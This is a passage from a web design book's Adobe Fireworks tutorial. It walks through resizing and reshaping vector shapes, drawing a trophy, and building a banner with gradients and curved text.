 

 

Please note that the Pointer tool turns from black to white when you got the edge correctly. This can 

be difficult if you are new to Fireworks or any other graphics application for that matter. Once again 

see the screenshot below shows the difference, before and after you got the point right. 

 

You can spot the difference from the Pointer colour. And if you are finding this difficult to get, then I 

think you should try using the Properties option for resizing. 

Step2. Click and hold down the mouse then drag to upper-left, since we are reducing the size, the 

illustrated screenshots below shows what the process will look like.  
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Now this reduction should be visible in the properties par, below is the screenshot of what I have on 

my screen. 

 

You can recall that the size before reduction was Width: 207 and Height: 119. Once again remember 

that your rectangle may not necessarily have the same size. 

Optionally you can alter this number from the properties bar to modify the size of the image, which 

is another handy way to change the size of an object with ease and accuracy, see the next exercise. 

Entering the size number from the Properties bar   

Step1. Select the rectangle if not selected already.  
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The illustration above shows the current size of the rectangle in the Properties bar 

Step2. Change the current size number to 150 for Width and 120 for Height. 

  

Note: I only use this size number for an example beside it look more accurate than the previous one 

although the difference in the size of the rectangle may not be very visible, If you want you can enter 

a bigger value for example 500 for width and also 500 for height to have a bigger and perfect square 

instead of rectangle, which is another advantage of using this option. If you change the size from 150 

by 120 to any size when practicing, don’t forget to return it because more objects will still be drawn 

on the canvas space later.    

   

Note: the size is measured in a pixel which is the unit for digital publishing such as the web, rather 

than inches or centimeters which are common with the printing media. 
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Moving the object 

Now let’s move the object toward the top-right of the canvass, to have more space to draw other 

objects. 

Step1. Select the rectangle using the pointer tool. 

Step2. Click on the rectangle while holding-down the mouse button, drag the rectangle toward the 

top-left of the canvas, see the illustration below. 

 

 

 

 

 

Drawing other objects 

Just as we drew the rectangle, draw other objects, below is the screenshot containing other objects I 

drew to fill up the screen.   
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I drew all the Auto shape objects (Rectangle tool, Arrow, Beveled Rectangle, Chamfer Rectangle, 

Doughnut, L-Shape, Ellipse tool, Smart Polygon and Star) from the group where I pick the rectangle 

from, follow the step discuss earlier in page (Grouped Tools) to display this other tools from the 

group, once again the shot below is what this looks like. 
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After displaying these tools from the group, then you can click either of the Auto shape objects and 

draw them on the canvas just as you did with the rectangle.   

 

Saving Firework document 

If the document is not saved you see * (asterisk) 

sign, indicated on the document bar just like 

Dreamweaver, and our document (Untitled-1.png) is 

not saved; now let’s save it. 

 

 

Step1. Click on the menu FILE > SAVE   

 

 

Or use the shortcut CTRL+S 

Using either option will pop-up the save-as dialogue box as we have in the screenshot below (if the 

document is being save for the first time) 
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As you can see from the screenshot above I chose to save the file in the default “My Pictures” folder, 

you can choose another location.  

 

Step2. Enter “Shapes” for the File Name and click the Save button. 

 

After saving the file or document, this new name should now reflect on the document bar and the 

asterisk (*) sign should be out, as we have in the screenshot below. 



Web Design and Programming by Ben Onuorah www.NEMSacademy.com/wdp 

263 

 

 

Remember, just like Dreamweaver any time you make any change to the document  the asterisk will 

appear again, for example I change the colour of the rectangle to blue, you can see the * sign again. 

 

Then after saving the document again using CTRL+S (This time the dialogue box won’t appear again, 

since this is not the first save) now the asterisk will leave again to indicate that the change has had 

saved. 
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Closing the file or closing the program 
 It’s possible to close document and not close the Firework program.  But when Firework is close all 

its document or files will be closed as well.  

 

You may close the document or the program altogether. 

Open the file 

Now go to the location where you saved the file,  I saved mine in My Picture folder, so I simply go to 

the folder and double click the file “shapes” to open it. 

 

With the file now open as we have in the screenshot below… 
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Basic object Shaping 
Altering Auto shapes object using the control points 

The control points, gives you the options to alter some objects (Auto shapes), for example you want 

the star to have 8 or 10 points, instead of 5, this is where the control point become useful. The 

example below helps us to explore these features. 

 Step1. Select the star, by clicking on it. 
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As you can see, selecting the STAR auto shape object doesn’t just show the four blue square-shaped 

selection signs as we have with the rectangle, but several other yellow diamond-shaped symbols 

which are called the Control Points.  

 

Another interesting thing about the Control Points is that each of the Control points, help us to alter 

the shape of the objects differently, to understand this you could move your mouse toward each 

Control Points to see the caption it shows. See the shots below 

 

As you can see the Caption actually guide’s us on the Control Point to move. 

So I would like to add more sides or points to the star, to be specific 10 points. To achieve this we 

will go with the 5th Control point.  We continue from the last step, with the star still selected. 

Step2. Move your mouse to the 5th Control Point, being the one that handles number of points of 

the star. 
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Step3. Click and hold-down the mouse button on the Control point, and move it Clock-wise to add 

more points to the star. With the help of the illustration below you will have a clearer understanding 

of the process. 

 

Similarly; moving the mouse anti-clock wise would produce opposite result; that is reducing the 

number of points. 

Below is how the Control Points affect order objects from this group, so you can spend time to 

explore and see for yourself.   

Arrow: using control points, you can alter the arrowhead, the tail width and length, and the tip 

length. 

Pie draws: using control points, you can you can alter pie circumference. 

Beveled Rectangle: using control points, you can alter the amount of bevel.  

Chamfer Rectangle: using the control points, you can alter the chamfer radius.  

Doughnut: using control points, you can alter the inner perimeter.  

Smart Polygon: using control points, you can resize and rotate, add or remove segments, increase or 

decrease the number of sides, or add an inner polygon to the shape. 

Rounded Rectangle: using control points, you can edit the roundness of all corners together, or 

change the roundness of individual corners. 

Spiral: using control points, you can alter the number of spiral rotations, and you can determine 

whether the spiral is open or closed. 

L-Shape: using control points, you can alter the width and length of the vertical and horizontal 

sections among others. 
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Drawing the Trophy 
Although the control point gives us the opportunity to modify some shapes, but it is very limited 

when it comes to more complex object, for example the trophy below.  

 

To draw the trophy above we will have to apply all what we’ve learnt earlier in addition to some 

other new tools, although the mastery of this may take some time, but once you have mastered it I 

bet you can use this same knowledge to draw any other objects no matter how complex, from a logo 

to sport car it all depends on your level of creativity.   

In the next exercise we will be drawing this trophy, while learning to create more complex shapes.   

 

Start by creating a new Fireworks document, with width 500 and height 500 canvas size in pixels 

and save the file as “trophy”.  

Remember that in the previous exercise we set the fill tool to be red colour , but in 

this exercise we will be setting the fill to transparent; that is no colour, and we also need to 

set stroke or line too to black, just as we have in the trophy above.  

So let us setup this stroke colour and remove the red fill colour, you can skip this exercise if 

your fill and stroke colour are already set. 
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Setup stroke Colour 
 

 

1. Click on the Fill tool 

2. Choose  transparent or no colour from the palette   

3. Click on the stroke tool 

4. Choose  black from the palette, below is the BEFORE and AFTER result. 

  

We can now start drawing the trophy, by following the steps below. 

 

 

Creating More Complex Shaping (drawing the Trophy) 
Step1. Create a rectangle, as we have below. 
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Step2. We need to convert the rectangle to an editable vector, so that we can move its individual 

edges or point. See the process below 

 

Converting to an editable vector 
1. Click on the rectangle to select it  

2. Click on the Subselection tool , from the tool bar. 
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3. Click any of the points or node at the edges of the rectangle using the subselection tool. See the 

screenshot below. 

  

In order to know that you have gotten the point immediate you click at it, a pop-up box will appear 

to alert you of your action.  

 

3. Click the Ok button, that’s all 

To see the effect of converting this object to a vector, still using the Subselection tool you can now 

click and drag individual point of the rectangle to alter its shape, see what I mean below. 
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Undo and Redo 
Please don’t forget to undo (CTRL+Z) this changes to return the object to rectangle.  

Just in case you mistakenly undo the “conversion to vector” you can use CTRL+Y to redo this 

action. If you are not sure I will advice you, redraw the rectangle and convert it to vector 

from start.    

So with the rectangle back to its initial state and converted to vector, now we will continue by 

adding more point or node so that we can have easy way to adjust the rectangle and turn it to the 

trophy, but to know where to put the nodes or points we need something to guide us. Follow the 

next step to get this done.   

 

Step2. We need to pull-out the guide line to help us know the path of the rectangle we will be 

adjusting to get the desired shape of the trophy.  

See the illustration below to see how guide line would help in the shaping the rectangle to the 

trophy. 

 

You can see what the guide line will look like. Now let’s see how to access the guide line   

 

How to use Guide 
1. Ensure that the ruler is displayed, if not Click View > Rulers from the menu.  

See the difference, in the screenshot below.  
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2. Click and then drag from the horizontal ruler to the canvas and release the mouse button. See the 

screenshot below. 

 

Note: you must drag the guide line to the canvas else it won’t appear. You can as well drag the line 

out of the canvas to remove it.   

So drag out two(2) more horizontal guide from the horizontal ruler, to make it three(3) and two(2) 

vertical guide from the vertical ruler to have what we have in the screenshot below.   
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Now let’s continue. 

Step3. We need to add six (6) control nodes to different paths of the rectangle, but in order to have 

a closer view while picking these paths we need to zoom at the rectangle. See the steps below. 

 

Zoom 

1. Click on the zoom tool  from the tool bar. See the screenshot below.  

 

2. using the zoom tool , click and the drag it on the specific location you want zoom (the 

rectangular zoom path) of the rectangle. As we have in the screenshot below. 
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3. When you release the mouse button, your window will be zoom in (see closer view of) that 

location.  

Similarly to zoom out, or restore the view to its initialize state; still with the zoom tool  

right click on the canvas with the zoom tool and click Zoom Out or Fit All from the menu 

display 

 

 

Note: you may have to try more than once if you are not familiar with similar application 

before now. 
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Below is what the zoom in window should appear like. 

 

Now that you have zoomed in, we can now see closer where we are going to add some more nodes 

to the line of the rectangle.  

Add Nodes and Reshape Object  
I use the red circle to specify in the illustration copy below, where we are going to add this node as 

you can see we need to add SIX nodes to the specified areas of the rectangle to enable us shape it to 

the trophy. 
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Step4. To do this we have to use the Pen tool , so click on the pen tool from the tool bar. 

 

Using the pen tool and click, to add nodes to each of the six illustrated points of the rectangle, when 

this is done you will notice similar nodes like the ones we have on the four edges of the rectangle.  

See the screenshot below. 

 

Note: I now use the numbers 1 to 6 to illustrate the position of these nodes. 
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Now that we are through adding all the necessary nodes, we can now adjust some nodes to alter the 

shape of the rectangle. First ensure that the rectangle is selected. 

Step5. Using the Subselection tool  click and drag the node in position 3 of our Illustration; inside 

towards the intersected guides in front of it, See the screenshot below. 

 

Now that we’ve shaped that area of the rectangle, we will also use the Subselection tool   to alter 

the node in position 4 (drag inside towards the intersected guide),  
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After this you can now Zoom out or better still Zoom Fit All, to have a further view of what we’ve 

done to the rectangle.  

 

Please don’t forget to save (CTRL+S) the changes you’ve made to this document.   

Below “The current state” is what you should have on your screen. 
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I put the other two images “The Completed project” and “The next state” at the right-side to let you 

see once more what the competed project would look like because in the next exercise we will 

continue to shape the object to what we have in “the next state” image. 

 

Below is the illustrated copy of what we have above “The current state”; with the lines we are going 

to curve to what we have in “The next state” above, labeled A, B, C and D  

 

I have to zoom in once more to have a closer look, just as we did earlier, now that the view is 

closer like what we have below, we can now use the Freeform tool  to curve the lines as 

labeled above. 

Converting a straight line to a curve line 

 

Step6. Click on the Freeform tool  on the Toolbar, as shown in the screenshot below. 



Web Design and Programming by Ben Onuorah www.NEMSacademy.com/wdp 

281 

 

 

 

After clicking on the freeform tool, ensure to set the size to 60 at the Properties bar, below the 

Fireworks windows, as shown in the screenshot above.   

Step7. Using the Freeform tool click and drag the line (we labeled A) out, See the illustration below.  

 

Note: if you miss the line, use CTRL+Z to undo the action, when you get the point using the Freeform 

tool, you will notice the S sign below the mouse pointer, below is the zoomed view of what I mean. 

 

Now that we have converted the straight line to a curve, we can now use the Subselection tool  to 

adjust the curve further.  
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Ensure the object is selected now click on the Subselection tool  from the toolbar, the area you use 

freeform to convert to curve will clearly indicate to you that three additional nodes had been  

introduce from our last action. See the screenshot below. 

 

Using the Subselection tool  click on the node labeled Node 3 to select it, (when this is done; you 

will see some additional lines or control handles, as you will see later, we will use it to actualize our 

goal) so just press the delete key, to remove the Node 3, as we have in the illustration below. 

 

Likewise use the Subselection tool again to select Node1 and Node 2 and delete both as well; this 

should now look like what we have in the screenshot below except for the newly labels (Point A and 

Point B). 
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Now you might be surprise if the line has not returned to been straight line again; not really, to see 

what I mean, with the object still selected use the Subselection tool to click on the node in Point A, 

you will still notice the presence of the additional lines or control handles close to the parent nodes, 

as shown in the screenshot below. 

 

The reason why I remove the 3 added nodes is because the more nodes we have the difficult it would 

be to control them, therefore making things difficult for us. 

Now use the Subselection tool to click and drag the control handle (A) from the tail end, towards 

guide line below, as shown in the illustration screenshots below.   
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Still using the Subselection tool, do the same to the control handle (B) just click and drag it out a 

little as you can see below. 

 

 

After this is done we can now move our attention to the other side, and do the same to curve this 

other side; since they are similar, the picture at the left is the current state of our project, while the 

one at the right is what we’ll have when this is done (See the screenshot below).  
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We are almost done with the main path of the trophy, now we also need to curve the lines adjacent 

to the ones we’ve curved, but this time inward. See the illustrated completed work below. 

 

Again ensure that the object is selected and then click on the Freeform tool . 
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This time around I have to change the former size of the curve from the last 60 to 100 from the 

properties bar. 

 

I have to do this because I tried using the 60 earlier, but I could not get the control handles as I did 

with the last examples after deleting the entire extra nodes added. I assumed this is because this line 

is longer that the ones earlier. 

 

After changing the curve size I use the Freeform tool to drag the line (labeled A and B in the 

illustration “The current state”) inward, the result should now look like what we have at the right 

“The new state”. 

 

I believe you already zoomed in, now use the Subselection tool to click and delete all the extra 

nodes that were just added, just as we did earlier. See the illustration below. 



Web Design and Programming by Ben Onuorah www.NEMSacademy.com/wdp 

287 

 

 

Just as we did earlier, use  Subselection tool again to click on any on the nodes in point A or B as 

labeled in the illustration above (After Deleting), this will make the control handle to be visible as we 

did earlier, see what I meant below. 

 

Note, the control handle for point B is not as visible as that of point A,. So I have to zoom in to see it 

better. Sometime you just need to zoom in to see some like this. 
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Now still using the Subselection tool, I click and drag the Control handle for point B, inward, see the 

illustrations below. 

 

Follow by the Control handle for point A 
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Now repeat this same step as we did for label A and B to the opposite line, that is C and D below is a 

quick shots to illustrate this steps. 

 

Now that we have brought the result to partial conclusion as we have below (NOW), except for the 

handle, which we will look into next. 
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As you can see from the finish 

work, that the only remaining 

thing in our own trophy is just 

the handle, however I will like 

you to understand that this 

lesson may be using trophy as 

an example so that you can 

master the trick behind using 

this interesting web graphics 

software called Firework for 

shaping and creating 

interesting drawings.  

 

Drawing the Trophy handle  
When it comes to creating complex objects or artworks like the trophy in our example, different 

approach can be use, for example some people might prefer to use the Pen tool to draw the trophy 

rather than shaping the rectangle to the trophy as we did so far. 

Similarly, you can use the Pen tool to draw the handle or even shape another rectangle to the shape 

of the handle as we have below. 

  

It might interest you to know that I decided to use the approach of shaping a rectangle to trophy 

instead of using the Pen tool to draw, because I believe this approach will be easier for someone 

who is not already use to the traditional way of drawing, using a pencil on paper, like an artist or 

Illustrator, this are the category of people  I have to empathize  with “who cannot draw a straight 

line without using a ruler or similar object”, in this book, that is why I subjected to using the 

rectangle instead of the Pen tool so as to carry as many people as possible alone in this exercise. 
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With that taking care of, you could also possibly draw the handle of the trophy using the same 

method we use earlier “Shaping the rectangle”, but I consider it difficult, as compare to using an 

object that is closely related, just like the Doughnut object. See what I meant below.   

 

As you can see, the Doughnut object which can also be found from where your pick the Rectangle 

tools from (See Grouped Tools), is definitely closer (in shape) to the handle than the rectangle, 

therefore for this reason I chose to use the doughnut to get my trophy handle. 

Note, you can decided to draw you handle on a new canvas or simple draw it on the same canvas 

where we’ve been doing the drawing of the trophy already. In this book I choose the latter, which is 

to draw the handle on the same canvas close to trophy. 

 

Step1. Draw a doughnut, from the group where you get the rectangle (See Grouped Tools) 
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Step2. After clicking on the doughnut tool from the group, you can now click on the canvas to draw 

the doughnut, just as we have in the screenshot below. 

 

I never mind that the doughnut is so big and is right on top of the trophy, we are going to reduce it 

size and move from the top of the trophy. 

Step3. Use the Pointer tool to select the doughnut by clicking on it and then reduce it size from 200 

to 112 for both width and height as we have in the screenshot below. 

 

As you are reducing this number the changing will be effected immediate, now the doughnut should 

be smaller as we have in the screenshot below (1) as compare to what we have before. 

After this I use the Pointing tool to move the doughnut aware from the trophy as we now have in the 

second screenshot (2) 
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Remember the control nodes we discussed earlier, as you must have notice it is also present in the 

doughnut (the tiny yellow triangle nodes), as we have it in the above screenshots, with the use of 

this control nodes we are going to start by altering the doughnut shape, First lets widen its inner-

radius 

Step1. Using of the Pointer tool, locate the control nodes on the inner line the doughnut, See the 

screenshot below. 

 

Step2. Click and hold-down the mouse button and drag it outward a little, towards the outer radius, 

then release the mouse button, that all we need to widen its inner-radius 

See illustration below. 
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Good, we can now open or segment the doughnut, just as we had widen it, still use the Pointer, click 

on the control point (node) on the external radius  (See picture 1 below) and drag it clock-wide 

before releasing the mouse button. See the illustration below. 

 

The object we have in “The Result” above may look almost like what we have in the handle, but I 

think we have little work to do it to bring it to what we have in the handle. Below in “Current” is 

what we currently have and “Next” is what the actual handle should look like. 
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Now use the Sub-selection tool   to click on line of the object to select it, the object will now appear 

with some control node as we have below. 

 

Still using the Sub selection, click and try to move one of the nodes a little, an alert box will appear as 

we have below. 
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So click the checkbox “Don’t show again” as I already did in the screenshot above and click the OK 

button, because we will need to move this nodes a lot to reshape the object to the desired shape of 

the handle, and we won’t like the alert box to keep disturbing us. 

 

Moving more than one node at once 
I thought of the easiest way to adjust these nodes to achieve the desired shape of the handle, and 

the best option would be to move more than one node at a time. To do this, follow the step below. 

 

Step1. Use your Sub-selection tool to select the object (if it is cont selected already), as we did 

earlier. Note: we are actually interested in selecting the four nodes of the object, as shown in the 

illustrated screenshot below. 

 

Step2. Now continue by creating a marquee selection to cover these four nodes, by still using the 

Subselection tool to click and drag your mouse to cover the specific area (it will look like a rectangle), 

before release the mouse button. See illustration of this below. 
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As you can see, above (after the mouse button is release), the four nodes and their control handles 

are selected, now click and drag one of the four selected nodes (to be specific, the one at the top-

left) upward, this will actually move the four nodes simultaneously. See what I meant below. 

 

 

Please ensure you save your document. 

Without a second thought, you can see that what we have now is already what we need for the 

handle of our trophy, so we have our handle! But before we put it together with the trophy body, I 

will like to get the second handle from it, to do this we will have to duplicate and mirror or flip the 

duplicate. See the steps below. 

 

Duplicate object 
Step1. Select the handle, by using the Pointer tool to click on the line of the handle. 
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Step2. Click from the menu bar Edit > Duplicate to duplicate the object or use the shortcut 

Ctrl+Alt+D 

Immediately this is done you should have your duplicate copy on top of the other handle, as we have 

in the screenshot below. 

 

Step3. Still with the Pointer tool click and drag to move the duplicated copy to the other side of the 

trophy, as shown in the screenshot below. 

 

With the copy now at the right side, we can now turn or mirror it to face the opposite direction 
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Mirror or Flip object  
Step1. With the duplicated copy still selected. 

Ste2. Click from the menu bar Modify > Transform > Flip Horizontal  

See screenshot blow 

 

Below is what we should now have after flipping the duplicated copy. 
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We can now complete the task by putting the handles together with the body of the trophy; using 

Union in Fireworks. 

 

Joining Object Using UNION 
Step1. Position both handles closely on top of the main body of the trophy as we have below. 

 

Step2. Select all the three objects by using the Pointer tool to create a marquee selection as we did 

earlier or use the shortcut Ctrl+A 
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Step3. Click from the menu bar Modify > Combine Paths > Union as shown the screenshot below or 

use the shortcut Ctrl+Alt+U 

 

That is all, we are thought with this lesson, we now have our trophy completed as we have in the 

screenshot below. 
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Now save this document and close Fireworks, to relax and have a good rest. Because tech. people 

like us are tend to working long hours (most especially when you’re a freelance web designer or 

programmer like me) without noticing it, not until our back, hands or eye aches that we notice we 

have overdone it. So do me that favour to relax and take a nap now, just as I did while writing this 

book.   

 

 

Creating Banner 
In this exercise, we are going to be creating a banner, in which the trophy we created in the last 

lesson will be use. The final result of the banner we will be creating, will look like what we have 

below. 

 

 Creating this banner will expose us to interesting topics in Fireworks such as how to fill object or 

text with a colour blend called gradient, working with text, using Fireworks to trim, fade and improve 

a picture or image quality and how to apply and create  some interesting effect using Fireworks. 

We are going to start by creating a new document just as we did in the earlier section of this 

Fireworks chapter  
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Setting up the banner  
I assume Fireworks is started,, as usual click from the menu bar File>New or use the shortcut Ctrl+N 

this will make the New Document dialogue box to appear, now enter 800 for width and 150 for 

height and click the OK button, below is what the screen should look like. 

 

After clicking the OK button, your new canvas and document should now appear like what we have 

in the screenshot below. 
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Please save the document Ctrl+S, and name it “banner”, the next thing is to change the colour of the 

canvas from white to black.  

 

Change the canvas colour  
Step1. Click the tiny black arrow in front of Canvas, from the Properties bar (below the Fireworks 

window); this will display a colour palette. See the screenshot below. 

Step2. Choose or click black colour in the palette. See the screenshot below. 

 

The canvas should now appear like what we have below. 
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We now need to get an image to cover the entire canvas and fade it or make it a little bit 

transparent, by reducing its opacity. 

 

Copy picture to Firework 
First logon to www.bengallery.com/webbook/web.zip if you have not already done so in the 

Dreamweaver chapter, from the downloaded file you will extract the image I use for this background 

its names “back.png” or you can use any picture from your computer if you want. 

We can now open the picture file “back.png” in Firework.  

With our banner.png still opened, click from the menu bar File > Open locates the “back.png” and 

opens it.  

We should now have two open documents in Fireworks with “back.png” as active or visible 

document while “banner.png” is inactive. See the document bar in the illustrated screenshot below. 

 

Now that we’ve opened the “back.png” file we are now going to copy the file and make the 

“banner.png” active and paste it on its canvas. 

Step1. The Pointer tool should still be selected by default if not click on it  

Step2. Click on the image in “back.png” to select it. 
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Step3. Copy the image, by clicking from the menu bar Edit > Copy or use the shortcut Ctrl+C 

To paste the image on the “banner.png” document we have to make it active; this is simple…  

 

Making the document active 
Click on the document name, in this example “banner.png” from the document bar, just below the 

menu bar. See the screenshot below. 

 

 Note: Since banner.png is the active or visible document then back.png will be inactive. 

 

Now let’s paste the copied file to the banner.png document 
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Paste… 

To paste the image, click from the menu bar Edit > Paste or use the shortcut Ctrl+V 

Immediately, you past the image, it will cover the entire canvas, making it to look exactly like what 

we have in back.png, this is because I’ve edited and optimize the back.png to have the same size 

with this canvas, which is 800px by 150px. But for any reason if it does not cover the entire canvas 

you can use the Pointer tool to move or adjust the image to cover the entire canvas. 

 

You might be wondering since the image will cover the entire canvas why apply the black colour to 

the canvas then. This is because we are going to apply a transparent effect on the images which will 

make the black canvas behind it to because partially visible. 

We can now fade the image by reduce its opacity.  

 

 

Fade background image 
Step1. Once again click to select the image 

After select the image, you will see the opacity which is currently 100 at the right side of Properties 

bar (below Fireworks window). See below screenshot 

 

Step2. Reduce the Opacity from 100 to 40, by changing the text in the box and press 

enter on your keyboard when done. You can now see the difference below.   
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Since we are through with the “back.png” document, I think we should close this document. 

Close the document 
First by making the “back.png” document active once more, see …make the document active 

Now click the close X button on the document bar, see the screenshot below. 

 

Note, you may be prompt to save change, if this happened is, just click the “yes” button. 

 

We are now though with the background of the banner, we can now start with the content.  

 

First let’s start with the trophy. So open the “trophy.png” document in Fireworks, I believe this will 

take the place of the document “back.png” we just closed. Now the document bar should now 

appear like… 
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With the trophty.png document open and active, we are now going to reduce the size of the trophy 

to 100px by 100px, fill it with some color then copy it to the new “banner.png”. 

 

Resize object  
Step1. Using the Pointer tool to click on the line of the trophy to select, or just use the Ctrl+A to 

select everything we have on the canvas, since the trophy is the only object on the canvas. 

Step2. Change the size of the object from the Properties bar from 313 by 335 or whatever its size is 

to 100 by 100 and press enter on your keyboard, the trophy should now be reduced. See the 

screenshot below. 
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I think it would be nice to change its color before copying it to “banner.png” because the black lines 

of the trophy may be hard to see when pasted on the close-to-black background of the “banner.png” 

With the trophy still selected, now let’s change its colour.  

Fill Color 
Click the tiny black arrow close to the fill color from the Properties bar,  this will display a colour 

palette, so choose the colour “#FFCC00” (it’s like a gold colour) as shown in the screenshot below. 
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Note: the single cross line  indicate that the trophy was formally with NO fill color, after this is 

done, this should change to  with the trophy now fill with the selected colour as we have in 

the screenshot below. 

 

Note, the blue dots around the trophy indicate that the object is still selected. Now copy the trophy 

either via the menu bar Edit > Copy or shortcut Ctrl+C 

With the trophy now copied let’s return to the “banner.png” document, I hope you still have it as an 

inactive document in the document bar, if not open the “banner.png” file in Firework.  

Now click on the “banner.png” tab on the document bar to make it active, as shown in the 

screenshot below. 

 

 

With the “banner.png” now active, we can now paste the copies trophy on it, you can do this either 

from the menu bar Edit > Paste or use the shortcut Ctrl+V 
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After pasting the trophy on the “banner.png” document, it may not appear in the same location as 

what we have above, because after pasting the trophy I later use the Pointer tool (as can be seen on 

the object, in the screenshot above) to move it to that location.  

 

Since we are now through with the “trophy.png” document, please don’t forget to close, it, just as 

we did with “back.png”, Note, this time around, if you are ask to save changes choose “No”, because 

all the changes we made to it (since we opened it) where actually meant for the copy we’ve now 

pasted on “banner.png”. 

 

In case you have not noticed, the colour of the trophy in the completed banner is not just a solid 

“orange-gold” like colour as we have in ours, but also have a fade of white from the top. See the 

comparing difference below. 

 

So let’s add this white fading colour effect, to our own trophy, using gradient. 

 

Gradient fill 
Step1. Ensure that the trophy is select, by using the Pointer tool to click on it. 
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Step2. Click the fill category, which is currently “Solid”, this will display a menu as we have in the 

screenshot below. 

 

Step3. Move your mouse to “Gradient” and click “Linear” from the sub-menu display, see the 

screenshot below. 

 

The linear fill effect may not necessary be a combination of white as we expect, as we have in this 

example its actually combine with black (your may be any colour, never mind), secondly the fading 

may also appear horizontally (left to right) instead of vertically (top to down), as I have in the 

screenshot below, if this is the same with what you have don’t worry we will be learning how to fix 

both. 
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Note: As you can see from the sub-menu above, linear is just one type of gradient some other 

interesting gradients are radial, ellipse among other, so fill free to explore some of these gradients to 

see how they appear later. 

Presently, below is what the trophy looks like on my banner.png document. The one at the right is 

when the trophy is selected, so if you have not deselected already, your might appear like what we 

have on right. 

  

As expected, we want the linear gradient, to be vertical (top-down), so the step below will show us 

how to do that. 

 

 

Changing the gradient direction 

Step1. Select the trophy, (if not selected already). This will make a gradient handle, to appear on the 

object as have above “…when select”. 

Note. Dragging the circle end of the line (handle) will carry the entire gradient within the object, 

while dragging the square end  will only rotate it within the object, before you get confuse, lets 

continue with the next step, as this will make use of both. 

Step2. Click and drag the circle end of the handle, toward the top-center of the trophy, as shown in 

the illustration below. 
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Before someone get surprise what is going on here, I think we should proceed to the next step to 

see. 

Step3. Now click and drag the square end of the handle, downward-centered (like you are rotating 

it) just below the trophy, as we have in the screenshot below. 

 

As you can see, this has taken care of the gradient direction thing, from horizontal to vertical. The 

next thing is to change the black colour of the gradient to white. 

 

Modifying gradient colours 

Step1. Ensure that the object is selected, in this instance the trophy 

Step2. Reach to the fill bucket, on the Properties bar and click the colour chooser, this will bring out 

a unique colour option, instead of the usual pallet; this is because the selected object is fill with a 

gradient and not a solid colour as it was before. Below is what the unique colour option looks like. 
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Step3. Click on the left (black) colour picker chooser, then click on the white colour from the pallet 

displayed. See the screenshot below. 

 

After this is done, I can now proudly tell you that we are through with our trophy, as we have in the 

screenshot below (after I have deselected it). 

Please don’t forget to save your document (Ctrl+S) at this juncture. 
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Next; we will be discussing the text, as you can see once again in the sample we are imitating below. 

 

  

Let’s start with the “we are the best” curve text, below the trophy, with our banner.png document 

still opened, follow the steps below. 

 

Inserting text 
Step1. Click on the Text tool (the A sign) from the tool box, see the screenshot below. 

  

Step2. Now click on the canvas with the Text tool, to insert a cursor on that location. See the 

screenshot below. 
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Step3. Type the text “we are the best”; on the system the text appears red, your may be in any other 

colour, but never mind because in the next exercise, we will learn how to change the text colour.   

 

 

Change text colour  
Step1. Ensure that the text is still selected, as we have in the last screenshot above. 

Step2. Click on the colour chooser   from the properties bar. See the screenshot below 

 

Note: I purposely capture almost all the Properties bar (above) after the text is select so that you can 

notice some other text formatting tools such as Bold, Italics and Underline as well as font style; for 

example if your text is not size 15 as mine, you can adjust it immediately from here or you can try 

your hands on some of the other tools later. 

Step3. Click on the white colour, from the colour palette as shown in the screenshot below. 
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Now the text will appear white, as we have blow. 

 

Next, let’s bend or curve the text, as we’ve seen in the completed copy of the banner; this is a little 

tricky but easy, it can be done by attach the text to path, so let’s go. 

 

 

Attach text to path 
First we have to draw the path to which we will be attaching the text to, in the example that will be a 

circle of size 128 by 128, see how below. 

Step1. Click on the ellipse tool from the tool box, see the screenshot below (if you don’t know how) 
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Step2. With the ellipse tool clicked, click and drag your mouse on the canvas to draw the circle as we 

did in the earlier in chapter (Drawing a Rectangle and other objects) or . Below is what I drew. 

 

Never mind the size and colour of the circle as far as you can see it, (as shown in the screenshot 

above) just proceed to the next step. 

Step3. With the circle still selected, you can now go to the Properties bar and change or enter 128 

for both the width and height and press the enter key to change the size the circle 

 

Note: some part of the circle may exceed outside of the canvas if this happens, use the Pointer tool 

to click and move the circle to be within the canvas. See the screenshot below. 

 

 

Now that we have the text and the object (circle) we can now attach the text to the object. To do 

this we will have to select both the text and the object without affecting others objects, most 

especially the background, using marquee selection as we did earlier will definitely select the 

background as well. So the best option is what I call “smart selection”. See the steps below. 
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Smart selections 

By the way: the smart selection allows you to selective multiple items or objects by holding 

down the CTRL key on your keyboard, while you click to select each objects, you only release 

the CTRL key when you’re done with selecting all the objects you need, because without 

holding the CTRL key, an already item will be deselecting if you attempt to click on another 

items.  

Step3. Select on the text “we are the best” by clicking on it. 

Step4. Now hold down the CTRL button on your keyboard and click on the object (circle). 

 

Step5. Click from the menu bar, Text > Attach to path, see the screenshot below.  
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The text would be attached to the circle and the circle will cease to exist or rather invisible, that is 

why I never bother about its colour anyway.  

Below (left) is what the result would look like, while the one at the (right) is when deselected (not 

selected). 

 

With this done, we are now going to change the direction of the attached text. 

 

Change Text or Object direction 
Step1. Ensure that the attached text still selected, as we have above (left) 

Step2. Click from the menu bar, Text > Reverse Direction see the result of this in the screenshot 

below. 

 

As you can see we are almost done, except that the text is not well positioned as we expect, to do 

this we will have to rotate the text to the expected position, this is done using Transform in 

Fireworks, see the steps below.   

Rotate 

Step1. Ensure that the text is selected. 

Step2. Click “Free Transform” from the menu bar, Modify > Transform > Free Transform 
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Or use the short cut. Ctrl+T 

The transform nodes will now appear around the text as we have below. 

 

Step3. Take your mouse to any of the square-node; your mouse pointer will change to the rotate 

sign, as shown below. For this exercise, mouse it to the node at the top-right (see the screenshot 

below).  
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Step4. With the mouse changed to the rotate sign above, click and hold down the mouse pointer 

and drag clock-wise till the text is positioned as we have below, before releasing the mouse button. 

 

I believe we are done with the text, now we can move it below the trophy. Use your Pointer tool to 

click and drag the text below the trophy, as shown in the screenshot below. 

 

As you can see “After deselecting” that we are through, so let’s GROUP both objects “the text and 

trophy” using the smart selection I introduce in earlier, select both objects. The screenshot will look 

like what we have below. 
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With both objects now selecting, we can now group them together, by following the steps below. 

 

Grouping and Ungrouping 
Step1. Ensure that both objects are selected, as we did above. 

Step2. Click from the menu bar, Modify > Group or use the shortcut Ctrl+G 

Both objects will now be grouped as we have below, so selecting or moving it around using the 

Pointer will move both as one entity. 

 

By the way: likewise you can ungroup both objects, if you want to alter them as an 

individual objects; to do this, select it (the grouped object) and click from the menu bar 

Modify > Ungroup  

 

Please don’t forget to save the document, before we continue. Let’s see what we have in our banner 

and the example we are imitating, so that we can know how far we have gone and what is 

remaining. 

Our banner 
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 The example 

 

As you can see, there is quite a number of texts we still have to deal with; once again using Text tool 

